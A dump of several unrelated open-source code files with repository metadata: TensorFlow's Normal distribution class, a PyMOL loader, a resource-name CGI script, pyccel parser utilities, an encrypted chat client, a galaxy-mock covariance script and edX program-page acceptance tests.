  pdf(x; mu, sigma) = exp(-0.5 (x - mu)**2 / sigma**2) / Z
  Z = (2 pi sigma**2)**0.5
  ```
  where `loc = mu` is the mean, `scale = sigma` is the std. deviation, and, `Z`
  is the normalization constant.
  The Normal distribution is a member of the [location-scale family](
  https://en.wikipedia.org/wiki/Location-scale_family), i.e., it can be
  constructed as,
  ```none
  X ~ Normal(loc=0, scale=1)
  Y = loc + scale * X
  ```
  #### Examples
  Examples of initialization of one or a batch of distributions.
  ```python
  import tensorflow_probability as tfp
  tfd = tfp.distributions
  # Define a single scalar Normal distribution.
  dist = tfd.Normal(loc=0., scale=3.)
  # Evaluate the cdf at 1, returning a scalar.
  dist.cdf(1.)
  # Define a batch of two scalar valued Normals.
  # The first has mean 1 and standard deviation 11, the second 2 and 22.
  dist = tfd.Normal(loc=[1, 2.], scale=[11, 22.])
  # Evaluate the pdf of the first distribution on 0, and the second on 1.5,
  # returning a length two tensor.
  dist.prob([0, 1.5])
  # Get 3 samples, returning a 3 x 2 tensor.
  dist.sample([3])
  ```
  Arguments are broadcast when possible.
  ```python
  # Define a batch of two scalar valued Normals.
  # Both have mean 1, but different standard deviations.
  dist = tfd.Normal(loc=1., scale=[11, 22.])
  # Evaluate the pdf of both distributions on the same point, 3.0,
  # returning a length 2 tensor.
  dist.prob(3.0)
  ```
  """
  @deprecation.deprecated(
      "2019-01-01",
      "The TensorFlow Distributions library has moved to "
      "TensorFlow Probability "
      "(https://github.com/tensorflow/probability). You "
      "should update all references to use `tfp.distributions` "
      "instead of `tf.distributions`.",
      warn_once=True)
  def __init__(self,
               loc,
               scale,
               validate_args=False,
               allow_nan_stats=True,
               name="Normal"):
    """Construct Normal distributions with mean and stddev `loc` and `scale`.
    The parameters `loc` and `scale` must be shaped in a way that supports
    broadcasting (e.g. `loc + scale` is a valid operation).
    Args:
      loc: Floating point tensor; the means of the distribution(s).
      scale: Floating point tensor; the stddevs of the distribution(s).
        Must contain only positive values.
      validate_args: Python `bool`, default `False`. When `True` distribution
        parameters are checked for validity despite possibly degrading runtime
        performance. When `False` invalid inputs may silently render incorrect
        outputs.
      allow_nan_stats: Python `bool`, default `True`. When `True`,
        statistics (e.g., mean, mode, variance) use the value "`NaN`" to
        indicate the result is undefined. When `False`, an exception is raised
        if one or more of the statistic's batch members are undefined.
      name: Python `str` name prefixed to Ops created by this class.
    Raises:
      TypeError: if `loc` and `scale` have different `dtype`.
    """
    parameters = dict(locals())
    with ops.name_scope(name, values=[loc, scale]) as name:
      # Positivity of `scale` is only asserted when validate_args is set, to
      # avoid the runtime cost of the check otherwise.
      with ops.control_dependencies([check_ops.assert_positive(scale)] if
                                    validate_args else []):
        self._loc = array_ops.identity(loc, name="loc")
        self._scale = array_ops.identity(scale, name="scale")
        check_ops.assert_same_float_dtype([self._loc, self._scale])
    super(Normal, self).__init__(
        dtype=self._scale.dtype,
        reparameterization_type=distribution.FULLY_REPARAMETERIZED,
        validate_args=validate_args,
        allow_nan_stats=allow_nan_stats,
        parameters=parameters,
        graph_parents=[self._loc, self._scale],
        name=name)
  @staticmethod
  def _param_shapes(sample_shape):
    # Both parameters share the requested sample shape.
    return dict(
        zip(("loc", "scale"), ([ops.convert_to_tensor(
            sample_shape, dtype=dtypes.int32)] * 2)))
  @property
  def loc(self):
    """Distribution parameter for the mean."""
    return self._loc
  @property
  def scale(self):
    """Distribution parameter for standard deviation."""
    return self._scale
  def _batch_shape_tensor(self):
    # Dynamic batch shape is the broadcast of the two parameter shapes.
    return array_ops.broadcast_dynamic_shape(
        array_ops.shape(self.loc),
        array_ops.shape(self.scale))
  def _batch_shape(self):
    # Static counterpart of _batch_shape_tensor.
    return array_ops.broadcast_static_shape(
        self.loc.get_shape(),
        self.scale.get_shape())
  def _event_shape_tensor(self):
    # Scalar distribution: empty event shape.
    return constant_op.constant([], dtype=dtypes.int32)
  def _event_shape(self):
    return tensor_shape.TensorShape([])
  def _sample_n(self, n, seed=None):
    # Sample standard normals and shift/scale them; this is what makes the
    # distribution fully reparameterized.
    shape = array_ops.concat([[n], self.batch_shape_tensor()], 0)
    sampled = random_ops.random_normal(
        shape=shape, mean=0., stddev=1., dtype=self.loc.dtype, seed=seed)
    return sampled * self.scale + self.loc
  def _log_prob(self, x):
    return self._log_unnormalized_prob(x) - self._log_normalization()
  def _log_cdf(self, x):
    # Numerically stable log of the standard normal CDF of the z-score.
    return special_math.log_ndtr(self._z(x))
  def _cdf(self, x):
    return special_math.ndtr(self._z(x))
  def _log_survival_function(self, x):
    # Survival = 1 - CDF; uses symmetry of the standard normal.
    return special_math.log_ndtr(-self._z(x))
  def _survival_function(self, x):
    return special_math.ndtr(-self._z(x))
  def _log_unnormalized_prob(self, x):
    return -0.5 * math_ops.square(self._z(x))
  def _log_normalization(self):
    # log Z = 0.5 log(2 pi) + log sigma
    return 0.5 * math.log(2. * math.pi) + math_ops.log(self.scale)
  def _entropy(self):
    # Use broadcasting rules to calculate the full broadcast scale.
    scale = self.scale * array_ops.ones_like(self.loc)
    return 0.5 * math.log(2. * math.pi * math.e) + math_ops.log(scale)
  def _mean(self):
    # Broadcast the mean against scale so the result has full batch shape.
    return self.loc * array_ops.ones_like(self.scale)
  def _quantile(self, p):
    # Inverse CDF: map through the standard normal quantile, then un-standardize.
    return self._inv_z(special_math.ndtri(p))
  def _stddev(self):
    return self.scale * array_ops.ones_like(self.loc)
  def _mode(self):
    # For a Gaussian the mode coincides with the mean.
    return self._mean()
  def _z(self, x):
    """Standardize input `x` to a unit normal."""
    with ops.name_scope("standardize", values=[x]):
      return (x - self.loc) / self.scale
  def _inv_z(self, z):
    """Reconstruct input `x` from a its normalized version."""
    with ops.name_scope("reconstruct", values=[z]):
      return z * self.scale + self.loc
class NormalWithSoftplusScale(Normal):
  """Normal with softplus applied to `scale`."""
  @deprecation.deprecated(
      "2019-01-01",
      "Use `tfd.Normal(loc, tf.nn.softplus(scale)) "
      "instead.",
      warn_once=True)
  def __init__(self,
               loc,
               scale,
               validate_args=False,
               allow_nan_stats=True,
               name="NormalWithSoftplusScale"):
    """Construct a Normal whose scale is softplus(scale), i.e. always positive."""
    parameters = dict(locals())
    with ops.name_scope(name, values=[scale]) as name:
      super(NormalWithSoftplusScale, self).__init__(
          loc=loc,
          scale=nn.softplus(scale, name="softplus_scale"),
          validate_args=validate_args,
          allow_nan_stats=allow_nan_stats,
          name=name)
    # Record the caller's original arguments (pre-softplus) as the parameters.
    self._parameters = parameters
@kullback_leibler.RegisterKL(Normal, Normal)
def _kl_normal_normal(n_a, n_b, name=None):
  """Calculate the batched KL divergence KL(n_a || n_b) with n_a and n_b Normal.
  Args:
    n_a: instance of a Normal distribution object.
    n_b: instance of a Normal distribution object.
    name: (optional) Name to use for created operations.
      default is "kl_normal_normal".
  Returns:
    Batchwise KL(n_a || n_b)
  """
  with ops.name_scope(name, "kl_normal_normal", [n_a.loc, n_b.loc]):
    one = constant_op.constant(1, dtype=n_a.dtype)
    two = constant_op.constant(2, dtype=n_a.dtype)
    half = constant_op.constant(0.5, dtype=n_a.dtype)
    var_b = math_ops.square(n_b.scale)
    var_ratio = math_ops.square(n_a.scale) / var_b
    mean_gap_sq = math_ops.squared_difference(n_a.loc, n_b.loc)
    # KL = (mu_a - mu_b)^2 / (2 sigma_b^2) + (ratio - 1 - log ratio) / 2
    return (mean_gap_sq / (two * var_b)
            + half * (var_ratio - one - math_ops.log(var_ratio)))
|
tensorflow/tensorflow
|
tensorflow/python/ops/distributions/normal.py
|
Python
|
apache-2.0
| 9,713
|
[
"Gaussian"
] |
bf95dc3061945a06c2acaf8d99f11423951ef49400fe5c5a847470d46c9caaad
|
# Load a PDB structure into PyMOL, to be exported later via export_to_gl.
import pymol
from pymol import stored
from pymol import cmd, CmdException
import export_to_gl as glmol
# NOTE(review): `cmd` was already imported above; this rebinding is redundant.
cmd=pymol.cmd
input_file='4oe9.pdb'
# Load the structure under the object name '4oe9'.
cmd.load( input_file , '4oe9' )
modelName='4oe9'
|
S-John-S/MAT
|
as1_script.py
|
Python
|
mit
| 190
|
[
"PyMOL"
] |
0e9751ba2c9453ca203c22f138717bab12bcc44d7209d0de2238b9da4e2113e1
|
#!/usr/bin/python
"""
Copyright 2012 Paul Willworth <ioscode@gmail.com>
This file is part of Galaxy Harvester.
Galaxy Harvester is free software: you can redistribute it and/or modify
it under the terms of the GNU Affero General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
Galaxy Harvester is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Affero General Public License for more details.
You should have received a copy of the GNU Affero General Public License
along with Galaxy Harvester. If not, see <http://www.gnu.org/licenses/>.
"""
import os
import sys
import Cookie
import dbSession
import dbShared
import cgi
import MySQLdb
try:
import json
except ImportError:
import simplejson as json
#
# CGI entry point (Python 2): suggest resource spawn names for a galaxy.
form = cgi.FieldStorage()
q = form.getfirst('query', '')
galaxy = form.getfirst('galaxy', '')
unavailable = form.getfirst('unavailable', '')
# escape input to prevent sql injection
q = dbShared.dbInsertSafe(q)
galaxy = dbShared.dbInsertSafe(galaxy)
errstr = ''
if galaxy.isdigit() == False:
	errstr = 'Error: You must specify a galaxy.'
# Start the suggestion list with an empty entry.
spawns = ['']
# NOTE(review): SQL is assembled by string concatenation; inputs pass through
# dbInsertSafe, but parameterized queries would be safer - confirm dbInsertSafe
# covers all injection vectors.
criteriaStr = ' WHERE galaxy = ' + str(galaxy)
if unavailable != 'on':
	criteriaStr += ' AND unavailable IS NULL'
qlen = len(q)
if qlen > 0:
	criteriaStr += ' AND SUBSTRING(spawnName, 1, ' + str(qlen) + ') = \'' + q + '\''
# Main program
print 'Content-type: text/html; charset=UTF-8\n'
if errstr == '':
	conn = dbShared.ghConn()
	cursor = conn.cursor()
	if (cursor):
		sqlStr = 'SELECT spawnName FROM tResources' + criteriaStr + ' ORDER BY spawnName'
		#sys.stderr.write(sqlStr + '\n')
		cursor.execute(sqlStr)
		row = cursor.fetchone()
		while (row != None):
			spawns.append(row[0])
			row = cursor.fetchone()
		cursor.close()
		conn.close()
	print json.dumps({'query': q, 'suggestions': spawns})
else:
	print errstr
|
druss316/G-Harvestor
|
html/getSpawnNames.py
|
Python
|
gpl-3.0
| 2,023
|
[
"Galaxy"
] |
faafc7793425e7b451154a30ad68dc974bb39b9a3d21452c22c6f4ba554c9889
|
# coding: utf-8
"""This file contains different utilities for the Parser."""
from redbaron import (CommentNode, ForNode, DefNode, WithNode,
IfNode, ElseNode, ElifNode, IfelseblockNode,
EndlNode)
from sympy import srepr
from pyccel.ast import DottedName
from sympy import Symbol
from sympy.printing.dot import dotprint
import os
# Maps the import name of a supported external library to the pyccel-internal
# module that provides its interface.
pyccel_external_lib = {"mpi4py"             : "pyccel.stdlib.external.mpi4py",
                       "scipy.linalg.lapack": "pyccel.stdlib.external.lapack",
                       "scipy.linalg.blas"  : "pyccel.stdlib.external.blas",
                       "scipy.fftpack"      : "pyccel.stdlib.external.dfftpack",
                       "fitpack"            : "pyccel.stdlib.internal.fitpack",
                       "numpy.random"       : "numpy",
                       "numpy.linalg"       : "numpy",
                       "scipy.interpolate._fitpack":"pyccel.stdlib.external.fitpack"}
def read_file(filename):
    """Returns the source code from a filename.

    Args:
        filename: path of the file to read.

    Returns:
        The file's full contents as a single string.
    """
    # Use a context manager so the handle is closed even if read() raises.
    with open(filename) as f:
        return f.read()
# ... checking the validity of the filenames, using absolute paths
def _is_valid_filename(filename, ext):
"""Returns True if filename has the extension ext and exists."""
if not isinstance(filename, str):
return False
if not(ext == filename.split('.')[-1]):
return False
fname = os.path.abspath(filename)
return os.path.isfile(fname)
def is_valid_filename_py(filename):
    """Returns True if filename is an existing python file."""
    # Thin wrapper: delegates the existence/extension check.
    return _is_valid_filename(filename, 'py')
def is_valid_filename_pyh(filename):
    """Returns True if filename is an existing pyccel header file."""
    # Thin wrapper: delegates the existence/extension check.
    return _is_valid_filename(filename, 'pyh')
# ...
# ...
def header_statement(stmt, accel):
    """Return stmt's value if it is a '#$ header' pragma comment, else None.

    this function can be used as the following
    >>> if header_statement(stmt):
    # do stuff
    ...
    """
    # The original body used bare `None` expressions (no `return`), so the
    # guards never short-circuited, and it tested the undefined name
    # `directive` (the value was bound to `header`), raising NameError.
    if not isinstance(stmt, CommentNode):
        return None
    if not stmt.value.startswith('#$'):
        return None
    directive = stmt.value[2:].lstrip()
    if not directive.startswith('header'):
        return None
    return stmt.value
# ...
# ... utilities for parsing OpenMP/OpenACC directives
def accelerator_statement(stmt, accel):
    """Returns stmt if an accelerator statement. otherwise it returns None.

    this function can be used as the following
    >>> if accelerator_statement(stmt, 'omp'):
    # do stuff
    ...

    In general you can use the functions omp_statement and acc_statement
    """
    assert(accel in ['omp', 'acc'])
    # The original guards were bare `None` expressions with no `return`, so
    # non-pragma nodes fell through to the final return instead of yielding None.
    if not isinstance(stmt, CommentNode):
        return None
    if not stmt.value.startswith('#$'):
        return None
    directive = stmt.value[2:].lstrip()
    if not directive.startswith(accel):
        return None
    return stmt.value
# Convenience predicates for the two supported accelerators.
omp_statement = lambda x: accelerator_statement(x, 'omp')
acc_statement = lambda x: accelerator_statement(x, 'acc')
# ...
# ... preprocess fst for comments
# Convenience selectors over a redbaron node list: each returns only the
# nodes of a single syntactic kind.
get_comments = lambda y: y.filter(lambda x: isinstance(x, CommentNode))
get_loops = lambda y: y.filter(lambda x: isinstance(x, ForNode))
get_defs = lambda y: y.filter(lambda x: isinstance(x, DefNode))
get_withs = lambda y: y.filter(lambda x: isinstance(x, WithNode))
get_ifs = lambda y: y.filter(lambda x: isinstance(x, (IfNode, ElseNode, ElifNode)))
get_ifblocks = lambda y: y.filter(lambda x: isinstance(x, IfelseblockNode))
def fst_move_directives(x):
    """This function moves OpenMP/OpenAcc directives from loop statements to
    their appropriate parent. This function will have inplace effect.
    In order to understand why it is needed, let's take a look at the following
    exampe
    >>> code = '''
    ... #$ omp do schedule(runtime)
    ... for i in range(0, n):
    ...     for j in range(0, m):
    ...         a[i,j] = i-j
    ... #$ omp end do nowait
    ... '''
    >>> from redbaron import RedBaron
    >>> red = RedBaron(code)
    >>> red
    0 '\n'
    1 #$ omp do schedule(runtime)
    2 for i in range(0, n):
          for j in range(0, m):
              a[i,j] = i-j
      #$ omp end do nowait
    As you can see, the statement `#$ omp end do nowait` is inside the For
    statement, while we would like to have it outside.
    Now, let's apply our function
    >>> fst_move_directives(red)
    0 #$ omp do schedule(runtime)
    1 for i in range(0, n):
          for j in range(0, m):
              a[i,j] = i-j
    2 #$ omp end do nowait
    """
    # ... def and with statements
    defs = get_defs(x)
    withs = get_withs(x)
    containers = defs + withs
    for stmt in containers:
        # Recurse first so nested bodies are fixed before we hoist.
        fst_move_directives(stmt.value)
        i_son = x.index(stmt)
        # Pop trailing comments/newlines off the body and re-insert them
        # right after the enclosing statement.
        while isinstance(stmt.value[-1], (CommentNode, EndlNode)):
            cmt = stmt.value[-1]
            stmt.value.remove(cmt)
            # insert right after the function
            x.insert(i_son + 1, cmt)
    # ...
    # ... if statements are inside IfelseblockNode
    ifblocks = get_ifblocks(x)
    for ifblock in ifblocks:
        i_son = x.index(ifblock)
        for stmt in ifblock.value:
            fst_move_directives(stmt.value)
            while isinstance(stmt.value[-1], (CommentNode, EndlNode)):
                cmt = stmt.value[-1]
                stmt.value.remove(cmt)
                # insert right after the function
                x.insert(i_son + 1, cmt)
    # ...
    # ... loops
    xs = get_loops(x)
    for son in xs:
        fst_move_directives(son)
        cmts = get_comments(son)
        # we only take comments that are using OpenMP/OpenAcc
        cmts = [i for i in cmts if omp_statement(i) or acc_statement(i)]
        for cmt in cmts:
            son.value.remove(cmt)
        # insert right after the loop
        i_son = x.index(son)
        for i,cmt in enumerate(cmts):
            son.parent.insert(i_son+i+1, cmt)
    # ...
    return x
# ...
# ...
def reconstruct_pragma_multilines(header):
    """Must be called once we visit an annotated comment, to get the remaining
    parts of a statement written on multiple lines."""
    # ...
    def _is_pragma(x):
        # A continuation pragma is a '#$' comment that does NOT open a new
        # header/omp/acc statement (those start their own pragma).
        if not(isinstance(x, CommentNode) and x.value.startswith('#$')):
            return False
        env = x.value[2:].lstrip()
        if (env.startswith('header') or
            env.startswith('omp') or
            env.startswith('acc')):
            return False
        return True
    _ignore_stmt = lambda x: isinstance(x, (EndlNode, CommentNode)) and not _is_pragma(x)
    def _is_multiline(x):
        # we use try/except to avoid treating nodes without .value
        try:
            # A line ending with '&' announces a continuation.
            return x.value.rstrip().endswith('&')
        except:
            return False
    condition = lambda x: (_is_multiline(x.parent) and (_is_pragma(x) or _ignore_stmt(x)))
    # ...
    if not _is_multiline(header):
        return header.value
    ls = []
    node = header.next
    while condition(node):
        # append the pragma stmt
        if _is_pragma(node):
            ls.append(node.value)
        # look if there are comments or empty lines
        node = node.next
        if _ignore_stmt(node):
            node = node.next
    # Join the pieces and strip the pragma markers / continuation characters.
    txt = ' '.join(i for i in ls)
    txt = txt.replace('#$', '')
    txt = txt.replace('&', '')
    txt = '{} {}'.format(header.value.replace('&', ''), txt)
    return txt
# ...
# ... utilities
def view_tree(expr):
    """Views a sympy expression tree."""
    # srepr prints the full, unambiguous constructor form of the expression.
    print (srepr(expr))
# ...
def get_default_path(name):
    """this function takes a an import name
    and returns the path full bash of the library
    if the library is in stdlib

    Args:
        name: import name, as a str, DottedName or Symbol.

    Returns:
        The pyccel-internal import path (DottedName or str) when *name* is a
        known external library, otherwise *name* unchanged.
    """
    # Normalize DottedName/Symbol to a plain string for the lookup.
    name_ = str(name) if isinstance(name, (DottedName, Symbol)) else name
    # Membership test directly on the dict (no needless .keys()).
    if name_ in pyccel_external_lib:
        parts = pyccel_external_lib[name_].split('.')
        if len(parts) > 1:
            return DottedName(*parts)
        return parts[0]
    return name
|
ratnania/pyccel
|
pyccel/parser/utilities.py
|
Python
|
mit
| 7,995
|
[
"VisIt"
] |
c75ad30919adfd1925a3728064a2bf1a80ec5568f8976fcb1c7d70b73ef3ba86
|
# neuron_client
import base64
import sys, socket, select
from Crypto.Cipher import AES
import os
import hashlib
import signal
# Clear the terminal and show the startup banner (Python 2 print statement).
os.system("clear")
print """
	~####~~~~####~~~######~~#####~~~######
	##~~##~~##~~##~~~~##~~~~##~~~~~~~~##
	##~~##~~##~~~~~~~~##~~~~####~~~~~~##
	##~~##~~##~~##~~~~##~~~~##~~~~~~~~##
	~####~~~~####~~~~~##~~~~#####~~~~~##
	$$__$$_$$$$$$_$$$$$$_$$$$$$
	_$$$$____$$_____$$______$$
	__$$_____$$_____$$_____$$
	_$$$$____$$_____$$____$$
	$$__$$_$$$$$$_$$$$$$_$$$$$$
	Octet | Power by Xiiz
	"""
def sigint_handler(signum, frame):
	# Handle Ctrl-C: announce shutdown and exit the process cleanly.
	print '\n user interrupt ! shutting down'
	print "[info] shutting down NEURON \n\n"
	sys.exit()
# Install the handler so SIGINT triggers the graceful shutdown above.
signal.signal(signal.SIGINT, sigint_handler)
def hasher(key):
	# Derive a 32-hex-char key string from the passphrase: sha512, then md5
	# of the hex digest. NOTE(review): md5 is cryptographically weak; a real
	# KDF would be preferable, but changing this breaks ciphertext
	# compatibility with existing peers - confirm before touching.
	hash_object = hashlib.sha512(key)
	hexd = hash_object.hexdigest()
	hash_object = hashlib.md5(hexd)
	hex_dig = hash_object.hexdigest()
	return hex_dig
def encrypt(secret,data):
	# Pad the plaintext to a 32-byte boundary with '{' and return the
	# base64-encoded AES ciphertext.
	# NOTE(review): AES.new(secret) with no explicit mode appears to use
	# PyCrypto's default (ECB) - confirm; ECB leaks plaintext patterns.
	BLOCK_SIZE = 32
	PADDING = '{'
	pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * PADDING
	EncodeAES = lambda c, s: base64.b64encode(c.encrypt(pad(s)))
	cipher = AES.new(secret)
	encoded = EncodeAES(cipher, data)
	return encoded
def decrypt(secret,data):
	# Reverse of encrypt(): base64-decode, AES-decrypt, then strip the '{'
	# padding appended by the sender.
	BLOCK_SIZE = 32
	PADDING = '{'
	pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * PADDING
	DecodeAES = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(PADDING)
	cipher = AES.new(secret)
	decoded = DecodeAES(cipher, data)
	return decoded
def chat_client():
	# Interactive encrypted chat loop (Python 2). Reads host/port/password/
	# nickname from argv, then multiplexes stdin and the socket with select().
	if(len(sys.argv) < 5) :
		print 'Usage : python neuron.py <hostname> <port> <password> <nick_name>'
		sys.exit()
	host = sys.argv[1]
	port = int(sys.argv[2])
	key = sys.argv[3]
	# The shared password is stretched into the AES key (see hasher()).
	key = hasher(key)
	uname = sys.argv[4]
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.settimeout(2)
	try :
		s.connect((host, port))
	except :
		print "\033[91m"+'Unable to connect'+"\033[0m"
		sys.exit()
	print "Connected to remote host. You can start sending messages"
	sys.stdout.write("\033[34m"+'\n[Me :] '+ "\033[0m"); sys.stdout.flush()
	while 1:
		socket_list = [sys.stdin, s]
		# Block until either the server sent data or the user typed a line.
		read_sockets, write_sockets, error_sockets = select.select(socket_list , [], [])
		for sock in read_sockets:
			if sock == s:
				# Incoming message from the server: decrypt and display.
				data = sock.recv(4096)
				if not data :
					print "\033[91m"+"\nDisconnected from chat server"+"\033[0m"
					sys.exit()
				else :
					data = decrypt(key,data)
					sys.stdout.write(data)
					sys.stdout.write("\033[34m"+'\n[Me :] '+ "\033[0m"); sys.stdout.flush()
			else :
				# User input: prefix with the nickname, encrypt and send.
				msg = sys.stdin.readline()
				msg = '[ '+ uname +': ] '+msg
				msg = encrypt(key,msg)
				s.send(msg)
				sys.stdout.write("\033[34m"+'\n[Me :] '+ "\033[0m"); sys.stdout.flush()
# Script entry point: run the client and propagate its exit status.
if __name__ == "__main__":
	sys.exit(chat_client())
|
R1Jo/xiiz
|
neuron.py
|
Python
|
gpl-3.0
| 3,056
|
[
"NEURON"
] |
2aa00e8fb916c0e028d4e615d39eaec1fe52b6a1400c75bc940a548121ca1c51
|
import numpy as np
import pyfof
from halotools.sim_manager import CachedHaloCatalog
from halotools.empirical_models import PrebuiltHodModelFactory
from halotools.mock_observables import tpcf
from halotools.mock_observables import FoFGroups
from halotools.empirical_models.factories.mock_helpers import three_dim_pos_bundle
import util
from group_richness import gmf_bins
from group_richness import richness
from group_richness import gmf as GMF
from data_multislice import hardcoded_xi_bins
def build_nbar_xi_gmf_cov(Mr=21):
    ''' Build covariance matrix for the full nbar, xi, gmf data vector
    using realisations of galaxy mocks for "data" HOD parameters in the
    halos from the multidark simulation. Covariance matrices for different sets of observables
    can be extracted from the full covariance matrix by slicing through
    the indices.

    Mr is the absolute-magnitude threshold (positive number; negated below).
    '''
    nbars = []
    xir = []
    gmfs = []
    thr = -1. * np.float(Mr)
    model = PrebuiltHodModelFactory('zheng07', threshold=thr)
    halocat = CachedHaloCatalog(simname = 'multidark', redshift = 0, halo_finder = 'rockstar')
    #some settings for tpcf calculations
    rbins = hardcoded_xi_bins()
    # NOTE(review): xrange(1, 125) gives 124 realisations, not 125 - confirm
    # the intended count.
    for i in xrange(1,125):
        print 'mock#', i
        # populate the mock subvolume
        model.populate_mock(halocat)
        # returning the positions of galaxies
        pos = three_dim_pos_bundle(model.mock.galaxy_table, 'x', 'y', 'z')
        # calculate nbar
        nbars.append(len(pos) / 1000**3.)
        # translate the positions of randoms to the new subbox
        #calculate xi(r)
        xi = tpcf(pos, rbins, period = model.mock.Lbox,
                  max_sample_size=int(2e5), estimator='Landy-Szalay')
        xir.append(xi)
        # calculate gmf
        nbar = len(pos) / 1000**3.
        # Friends-of-friends linking length scaled by the mean separation.
        b_normal = 0.75
        b = b_normal * (nbar)**(-1./3)
        groups = pyfof.friends_of_friends(pos , b)
        w = np.array([len(x) for x in groups])
        gbins = gmf_bins()
        gmf = np.histogram(w , gbins)[0] / (1000.**3.)
        gmfs.append(gmf) # GMF
    # save nbar variance
    nbar_var = np.var(nbars, axis=0, ddof=1)
    nbar_file = ''.join([util.multidat_dir(), 'abc_nbar_var.Mr', str(Mr), '.dat'])
    np.savetxt(nbar_file, [nbar_var])
    # write full covariance matrix of various combinations of the data
    # and invert for the likelihood evaluations
    # --- covariance for all three ---
    fulldatarr = np.hstack((np.array(nbars).reshape(len(nbars), 1),
                            np.array(xir),
                            np.array(gmfs)))
    fullcov = np.cov(fulldatarr.T)
    fullcorr = np.corrcoef(fulldatarr.T)
    # and save the covariance matrix
    nopoisson_file = ''.join([util.multidat_dir(), 'abc_nbar_xi_gmf_cov.no_poisson.Mr', str(Mr), '.dat'])
    np.savetxt(nopoisson_file, fullcov)
    # and a correlation matrix
    full_corr_file = ''.join([util.multidat_dir(), 'abc_nbar_xi_gmf_corr.Mr', str(Mr), '.dat'])
    np.savetxt(full_corr_file, fullcorr)
    return None
# Allow running this module directly to build the covariance matrices.
if __name__ == "__main__":
    build_nbar_xi_gmf_cov(Mr=21)
|
mjvakili/ccppabc
|
ccppabc/code/archive/abc_covariance.py
|
Python
|
mit
| 3,083
|
[
"Galaxy"
] |
9e56181437ce2089333cc6c1eeb2633b10c1c00a3b4eddf1b3699963e9c6b94d
|
"""Acceptance tests for LMS-hosted Programs pages"""
import pytest
from common.test.acceptance.fixtures.catalog import CatalogFixture, CatalogIntegrationMixin
from common.test.acceptance.fixtures.course import CourseFixture
from common.test.acceptance.fixtures.programs import ProgramsConfigMixin
from common.test.acceptance.pages.common.auto_auth import AutoAuthPage
from common.test.acceptance.pages.lms.catalog import CacheProgramsPage
from common.test.acceptance.pages.lms.programs import ProgramDetailsPage, ProgramListingPage
from common.test.acceptance.tests.helpers import UniqueCourseTest
from openedx.core.djangoapps.catalog.tests.factories import (
CourseFactory,
CourseRunFactory,
PathwayFactory,
ProgramFactory,
ProgramTypeFactory
)
class ProgramPageBase(ProgramsConfigMixin, CatalogIntegrationMixin, UniqueCourseTest):
    """Base class used for program listing page tests."""
    def setUp(self):
        super(ProgramPageBase, self).setUp()
        self.set_programs_api_configuration(is_enabled=True)
        # Three standalone programs plus whatever the pathways carry.
        self.programs = ProgramFactory.create_batch(3)
        self.pathways = PathwayFactory.create_batch(3)
        for pathway in self.pathways:
            self.programs += pathway['programs']
        # add some of the previously created programs to some pathways
        self.pathways[0]['programs'].extend([self.programs[0], self.programs[1]])
        self.pathways[1]['programs'].append(self.programs[0])
        self.username = None
    def auth(self, enroll=True):
        """Authenticate, enrolling the user in the configured course if requested."""
        CourseFixture(**self.course_info).install()
        course_id = self.course_id if enroll else None
        auth_page = AutoAuthPage(self.browser, course_id=course_id)
        auth_page.visit()
        self.username = auth_page.user_info['username']
    def create_program(self):
        """DRY helper for creating test program data."""
        course_run = CourseRunFactory(key=self.course_id)
        course = CourseFactory(course_runs=[course_run])
        program_type = ProgramTypeFactory()
        return ProgramFactory(courses=[course], type=program_type['name'])
    def stub_catalog_api(self, programs, pathways):
        """
        Stub the discovery service's program list and detail API endpoints, as well as
        the credit pathway list endpoint.
        """
        self.set_catalog_integration(is_enabled=True, service_username=self.username)
        CatalogFixture().install_programs(programs)
        program_types = [program['type'] for program in programs]
        CatalogFixture().install_program_types(program_types)
        CatalogFixture().install_pathways(pathways)
    def cache_programs(self):
        """
        Populate the LMS' cache of program data.
        """
        cache_programs_page = CacheProgramsPage(self.browser)
        cache_programs_page.visit()
class ProgramListingPageTest(ProgramPageBase):
    """Verify user-facing behavior of the program listing page."""
    shard = 21
    def setUp(self):
        super(ProgramListingPageTest, self).setUp()
        self.listing_page = ProgramListingPage(self.browser)
    def _assert_empty_listing(self):
        # Shared check: the sidebar renders but no program cards appear.
        self.listing_page.visit()
        self.assertTrue(self.listing_page.is_sidebar_present)
        self.assertFalse(self.listing_page.are_cards_present)
    def test_no_enrollments(self):
        """Verify that no cards appear when the user has no enrollments."""
        self.auth(enroll=False)
        self.stub_catalog_api(self.programs, self.pathways)
        self.cache_programs()
        self._assert_empty_listing()
    def test_no_programs(self):
        """
        Verify that no cards appear when the user has enrollments
        but none are included in an active program.
        """
        self.auth()
        self.stub_catalog_api(self.programs, self.pathways)
        self.cache_programs()
        self._assert_empty_listing()
@pytest.mark.a11y
class ProgramListingPageA11yTest(ProgramPageBase):
    """Accessibility audits for the program listing page."""

    def setUp(self):
        super(ProgramListingPageA11yTest, self).setUp()
        self.listing_page = ProgramListingPage(self.browser)
        self.program = self.create_program()

    def _visit_and_audit(self, cards_expected):
        """Visit the listing page, check card presence, then run the a11y audit."""
        self.listing_page.visit()
        self.assertTrue(self.listing_page.is_sidebar_present)
        if cards_expected:
            self.assertTrue(self.listing_page.are_cards_present)
        else:
            self.assertFalse(self.listing_page.are_cards_present)
        self.listing_page.a11y_audit.check_for_accessibility_errors()

    def test_empty_a11y(self):
        """Test a11y of the page's empty state."""
        self.auth(enroll=False)
        self.stub_catalog_api(programs=[self.program], pathways=[])
        self.cache_programs()
        self._visit_and_audit(cards_expected=False)

    def test_cards_a11y(self):
        """Test a11y when program cards are present."""
        self.auth()
        self.stub_catalog_api(programs=[self.program], pathways=[])
        self.cache_programs()
        self._visit_and_audit(cards_expected=True)
@pytest.mark.a11y
class ProgramDetailsPageA11yTest(ProgramPageBase):
    """Accessibility audits for the program details page."""

    def setUp(self):
        super(ProgramDetailsPageA11yTest, self).setUp()
        self.details_page = ProgramDetailsPage(self.browser)
        self.program = self.create_program()
        # Point the stubbed catalog data at the UUID the details page will request.
        self.program['uuid'] = self.details_page.program_uuid

    def test_a11y(self):
        """Audit the details page for accessibility errors."""
        self.auth()
        self.stub_catalog_api(programs=[self.program], pathways=[])
